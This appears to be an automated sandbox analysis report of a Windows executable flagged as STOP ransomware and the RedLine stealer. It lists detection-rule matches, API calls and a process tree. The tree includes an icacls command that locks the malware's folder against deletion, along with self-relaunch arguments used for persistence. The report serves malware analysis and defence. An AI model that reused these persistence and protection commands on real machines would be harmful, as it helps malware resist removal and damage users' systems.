          Source: 00000014.00000002.1380517656.0000000002181000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000021.00000002.2454668093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000021.00000002.2454668093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000005.00000002.1261344737.000000000233F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000018.00000002.1506412476.00000000022EA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 6228, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 6476, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 1512, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 4244, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 1424, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 7864, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 66d5df681876c_file010924.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 66d5df681876c_file010924.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@23/1373@4/2
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,2_2_00411900
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00403900 GetCharWidthFloatA,GetCurrentProcess,SetLastError,GetCurrentProcess,GetCharWidthFloatA,GetBitmapBits,GetCharWidth32A,GetMenuStringA,LoadMenuW,CreateDCW,CreateFileMappingW,EnumResourceNamesA,InterlockedExchangeAdd,GlobalAlloc,VirtualProtect,LoadMenuW,CharUpperW,LoadMenuW,CharUpperW,GetTickCount,GetDiskFreeSpaceExA,SetConsoleCP,GetDiskFreeSpaceExA,SetConsoleCP,LoadLibraryW,PeekConsoleInputA,WaitForDebugEvent,LCMapStringW,SetEnvironmentVariableW,LCMapStringW,SetEnvironmentVariableW,OpenEventA,SetLastError,GetFileAttributesA,GetShortPathNameW,GlobalWire,GetFileAttributesA,GetShortPathNameW,GlobalWire,GetThreadPriorityBoost,SetDefaultCommConfigW,GetSystemWindowsDirectoryA,InterlockedCompareExchange,LoadLibraryA,0_2_00403900
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_022C97C6 CreateToolhelp32Snapshot,Module32First,0_2_022C97C6
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\geo[1].jsonJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: jJ,S0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: |6A(0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: <*yL0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: augY0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: hr_30_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: 6._;0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: Hk<0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: @9L/0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: L+U50_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: CS?0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: :6Y20_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: s.Y*0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: ,Sf0_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: `o@0_2_00406EB0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: --Admin2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: IsAutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: IsTask2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: --ForNetRes2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: IsAutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: IsTask2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: --Task2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: --AutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: --Service2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: X1P2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: --Admin2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: runas2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: x2Q2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: x*P2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: C:\Windows\2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: D:\Windows\2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: 7P2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: %username%2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: F:\2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: jJ,S5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: |6A(5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: <*yL5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: augY5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: hr_35_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: 6._;5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: Hk<5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: @9L/5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: L+U55_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: CS?5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: :6Y25_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: s.Y*5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: ,Sf5_2_00403BF0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCommand line argument: `o@5_2_00406EB0
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: --Admin12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: IsAutoStart12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: IsTask12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: --ForNetRes12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: IsAutoStart12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: IsTask12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: --Task12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: --AutoStart12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: --Service12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: X1P12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: --Admin12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: runas12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: x2Q12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: x*P12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: C:\Windows\12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: D:\Windows\12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: 7P12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: %username%12_2_00419F90
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCommand line argument: F:\12_2_00419F90
          Source: 66d5df681876c_file010924.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 66d5df681876c_file010924.exeReversingLabs: Detection: 71%
          Source: 66d5df681876c_file010924.exeString found in binary or memory: set-addPolicy
          Source: 66d5df681876c_file010924.exeString found in binary or memory: id-cmc-addExtensions
          Source: 66d5df681876c_file010924.exeString found in binary or memory: set-addPolicy
          Source: 66d5df681876c_file010924.exeString found in binary or memory: id-cmc-addExtensions
          Source: 66d5df681876c_file010924.exeString found in binary or memory: set-addPolicy
          Source: 66d5df681876c_file010924.exeString found in binary or memory: id-cmc-addExtensions
          Source: 66d5df681876c_file010924.exeString found in binary or memory: set-addPolicy
          Source: 66d5df681876c_file010924.exeString found in binary or memory: id-cmc-addExtensions
          Source: 66d5df681876c_file010924.exeString found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile read: C:\Users\user\Desktop\66d5df681876c_file010924.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe"
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe"
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
          Source: unknownProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
          Source: unknownProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe"Jump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSection loaded: mpr.dllJump to behavior
